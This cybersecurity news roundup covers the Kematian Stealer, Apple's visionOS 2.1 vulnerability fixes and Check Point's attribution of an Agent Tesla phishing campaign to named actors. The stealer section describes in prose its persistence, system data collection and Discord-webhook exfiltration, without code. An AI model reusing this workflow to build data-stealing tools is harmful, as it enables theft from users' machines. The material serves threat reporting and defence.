Anatsa Trojan’s new capabilities. Third-party breach hits airlines. Gas station blues. What’s up with the Internet Research Agency? Infrastructure threats. And DDoS grows more sophisticated.
Anatsa Trojan reveals new capabilities. Airlines report employee data stolen in a third-party breach. Canadian energy company SUNCOR reports a cyberattack. What of the Internet Research Agency? Microsoft warns of a rising threat to infrastructure. Joe Carrigan describes an ill-advised phishing simulation. Mr. Security Answer Person John Pescatore takes on zero days. And DDoS grows more sophisticated. Read More
Kematian Stealer Abuses Powershell Tool for Covert Data Exfiltration
The Kematian Stealer has emerged as a sophisticated PowerShell-based malware that covertly exfiltrates sensitive data from compromised systems.
This article delves into the intricate workings of this malicious tool, highlighting its methods and the potential risks it poses.
Binary Analysis
The Kematian Stealer begins its operation with a 64-bit portable executable loader file, written in C++.
This loader contains an obfuscated script within its resource section, designed to evade detection and analysis.
Upon execution, the malware extracts a blob identified as “112E9CAC33494A35D3547F4B3DCD2FD5” from the resource section, as per a report by K7 Labs.
This blob is then decrypted, revealing a batch file that initiates the next phase of the attack.
Resource Blob
The decryption process, likely utilizing the RC4 algorithm, is a critical step in the malware’s execution flow.
Decryption_Loop
Once decrypted, the batch file runs with elevated privileges, ensuring the subsequent PowerShell script can operate without hindrance.
This script checks for administrative rights and prompts the user, if necessary, before establishing persistence via the Windows Task Scheduler.
“Is Your System Under Attack? Try Cynet XDR: Automated Detection & Response for Endpoints, Networks, & Users!”- Free Demo
Persistence and Data Collection
The Kematian Stealer’s persistence mechanism involves creating a copy of the PowerShell script in the %Appdata% folder, named percs.ps1.
This script is then scheduled to run regularly, ensuring the malware’s continued presence on the infected system.
Task Creation
The core of the data exfiltration process lies in the grub function. This function collects a wealth of system information from the public IP address obtained through a web request to “https://api.ipify.org.”
The IP address is stored in a text file named “ip.txt” within the user’s local application data directory.
Next, the malware gathers detailed system information using the Windows command-line tool Systeminfo.exe.
This includes OS version, hostname, system model, and more, all saved in “system_info.txt”.
Additionally, the malware extracts the system’s UUID and MAC addresses using Windows Management Instrumentation (WMI) and stores these details in “uuid.txt” and “mac.txt,” respectively.
Network and User Information
The Kematian Stealer extends its data collection to network statistics by executing NETSTAT.exe, retrieving active connections and listening ports and associated process IDs.
This information is crucial for understanding the network environment of the compromised system.
Netstat Stealer
System environment variables also gather user and host information, providing the attacker with insights into the system’s user profile.
The collected data is meticulously formatted and sent to a Discord channel via a webhook, ensuring the attacker receives a comprehensive report of the victim’s system.
Data Exfiltration and Evasion
The final stage of the Kematian Stealer’s operation involves exfiltrating the collected data.
The malware compresses all the text files into a zip archive and uses Curl.exe to transfer the data and a JSON payload to a specified Discord channel.
This method leverages Discord’s infrastructure for covert communication, making detection and interception more challenging.
Data Compressing
To evade detection, the malware checks for the presence of security tools like Discord Token Protector and removes them if found.
It also attempts to download additional payloads from the Kematian Stealer GitHub page, although some URLs redirect to outdated versions.
The Kematian Stealer exemplifies the increasing sophistication of modern malware.
With features like a GUI builder, antivirus evasion, and capabilities to extract WiFi passwords, webcams, desktop screenshots, and session data from various clients, it poses a significant threat to individual users and organizations.
The Kematian Stealer’s abuse of PowerShell for covert data exfiltration underscores the need for continuous advancements in cybersecurity measures.
By understanding the tactics and techniques employed by such malware, we can better prepare and protect ourselves in the digital age.
Apple visionOS 2.1 Released with Fix for Multiple Security Vulnerabilities
Apple has recently rolled out the visionOS 2.1 update for its Apple Vision Pro mixed reality headset, addressing many critical security vulnerabilities that could have significant implications for user privacy and device integrity.
The update includes fixes for over 25 security issues that could allow malicious actors to execute arbitrary code, access sensitive data, or cause system crashes.
Among the most significant vulnerabilities patched is a kernel memory corruption issue that could enable apps to cause unexpected system termination or corrupt kernel memory.
The update also addresses several WebKit-related vulnerabilities, including one that could lead to unexpected process crashes when processing maliciously crafted web content.
Protecting Your Networks & Endpoints With UnderDefense MDR – Request Free Demo
Vulnerabilities Patched
The visionOS 2.1 update targets several high-severity vulnerabilities identified across various operating system components.
One key issue addressed is a path handling problem that could allow malicious apps to run arbitrary shortcuts without user consent, potentially leading to unauthorized access to sensitive data. This has been resolved through improved logic checks (CVE-2024-44255).
Another critical vulnerability involved the CoreMedia Playback component, where a malicious app could access private information due to improper handling of symlinks. This issue has been mitigated with enhanced symlink handling (CVE-2024-44273).
Several kernel-level vulnerabilities have been patched, including an information disclosure issue that could allow apps to leak sensitive kernel states. This has been addressed through improved private data redaction for log entries (CVE-2024-44239).
Additionally, a use-after-free issue in the IOSurface component, which could cause unexpected system termination or corrupt kernel memory, has been fixed with improved memory management (CVE-2024-44285).
WebKit, the web engine powering Safari on the Apple Vision Pro, has also received significant updates. Issues such as memory corruption and the failure to enforce Content Security Policy (CSP) when processing maliciously crafted web content have been addressed through improved input validation and checks (CVE-2024-44244, CVE-2024-44296).
To enhance user privacy, Apple has fixed several vulnerabilities related to data leakage. For instance, a bug in the Lock Screen that allowed users to view sensitive information has been rectified with improved redaction of sensitive data (CVE-2024-44262).
Similarly, issues in Siri and system logs that could expose sensitive user data have been resolved with enhanced redaction and validation measures (CVE-2024-44194, CVE-2024-44278).
Other Notable Fixes
Other notable fixes include:
ImageIO: Multiple issues related to processing images, including out-of-bounds reads and denial-of-service vulnerabilities, have been addressed with improved input validation and bounds checks (CVE-2024-44215, CVE-2024-44297).
Managed Configuration: A vulnerability that allowed malicious backup files to modify protected system files has been fixed with improved handling of symlinks (CVE-2024-44258).
Safari Downloads: An issue that could allow attackers to misuse trust relationships to download malicious content has been resolved through improved state management (CVE-2024-44259).
Users of the Apple Vision Pro are strongly advised to update their devices to visionOS 2.1 as soon as possible to mitigate these security risks. The update is available through the standard software update process.
Apple’s proactive approach to addressing these vulnerabilities underscores the company’s commitment to ensuring the security and privacy of its users, particularly in emerging technologies like mixed reality.
Apple has acknowledged the contributions of several security researchers and teams, including those from Trend Micro Zero Day Initiative, CrowdStrike Counter Adversary Operations, and various individual researchers, for their role in identifying and reporting these vulnerabilities. This collaborative effort is crucial in maintaining the security posture of Apple’s ecosystem.
Run private, Real-time Malware Analysis in both Windows & Linux VMs. Get a 14-day free trial with ANY.RUN!
Researchers Unveil The Attackers Behind The Agent Tesla Campaign
[[{“value”:”
Check Point Research has exposed a recent wave of cyberattacks utilizing the infamous Agent Tesla malware. This campaign targeted organizations in the United States and Australia.
First appearing in 2014, Agent Tesla masquerades as legitimate software but acts as a silent thief in the background.
It functions as a keylogger, recording every keystroke made on an infected device.
This allows attackers to steal sensitive information like usernames, passwords, and financial data, potentially leading to devastating consequences.
The attack, initiated in November 2023, relied heavily on phishing emails. These deceptive emails, often crafted with social engineering tactics, are designed to trick recipients into clicking malicious links or attachments.
In this case, the emails likely appeared to be legitimate purchase orders or delivery notifications, increasing the chance of someone clicking.
Check Point Research identified two key players in this operation: Bignosa, the main threat actor, and Gods, a possible collaborator.
Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .
Bignosa appears to be part of a larger group targeting organizations globally. Evidence suggests they possess vast email databases focusing on businesses, educational institutions, and even individuals in both the US and Australia.
Additionally, they maintain a network of servers used for remote access and launching phishing campaigns.
Attack Breakdown
Activity of the “Bignosa” threat actor shown on the timeline
Bignosa set up servers, installed email software like RoundCube, and uploaded malicious payloads protected with a custom tool called “Cassandra Protector.”
This tool disguises the initial code and converts the malware into seemingly harmless ISO files. Bignosa utilized stolen email credentials to send out phishing emails with disguised Agent Tesla attachments.
The emails mimicked legitimate business communications, likely leveraging content from online resources.
Upon clicking the attachment, the Agent Tesla malware downloaded and executed, silently stealing sensitive information from the infected device.
This information was then relayed back to the attacker’s servers. Following the initial attack on Australian organizations on November 7th, a second wave targeted both the US and Australia on November 30th.
The tactics remained consistent, highlighting the effectiveness of phishing emails for Bignosa.
Both campaigns employed Cassandra Protector, a commercially available tool that allows attackers to obfuscate malware and bypass security measures.
Bignosa leveraged Cassandra Protector’s functionalities like anti-virus evasion and creating ISO files to mask the true nature of the malware.
Bignosa, a cybercriminal likely from Kenya, appears to be a seasoned attacker. He uses the alias Nosakhare and has been conducting phishing campaigns for a while.
Evidence suggests he uses Agent Tesla and other malware (Quasar, Warzone, PureCrypter) and relies on tools like Grammarly and SuperMailer for his malicious activities.
Bignosa collaborates with Gods, another attacker who may operate under multiple aliases (Gods & Kmarshal).
Gods transitioned from phishing to malware campaigns around June 2023 and appears to be more technically skilled, even helping Bignosa clean Agent Tesla infections.
While the investigation couldn’t fully identify Gods, it revealed interesting clues. He potentially studied at a Turkish university, doesn’t speak Turkish fluently, and uses ChatGPT to translate spam messages.
Additionally, a YouTube channel (“8 Letter Tech”) linked to Gods’ email address provides tutorials on setting up email servers, potentially used for his malicious campaigns.
Bignosa & Gods Jabber conversations
The investigation uncovers their collaboration through shared resources and communication.
For example, a VDS server paid for by Bignosa was later administered by Gods. Social media analysis further strengthens the connection between Bignosa and Gods.
The investigation identified connections between accounts associated with both individuals, including a web design business potentially run by Gods (using the alias Kingsley Fredrick).
The investigation also revealed God’s continued malicious activity. He launched phishing campaigns in December 2023 and January 2024, highlighting the ongoing threat posed by this group.
Is Your Network Under Attack? – Read CISO’s Guide to Avoiding the Next Breach – Download Free Guide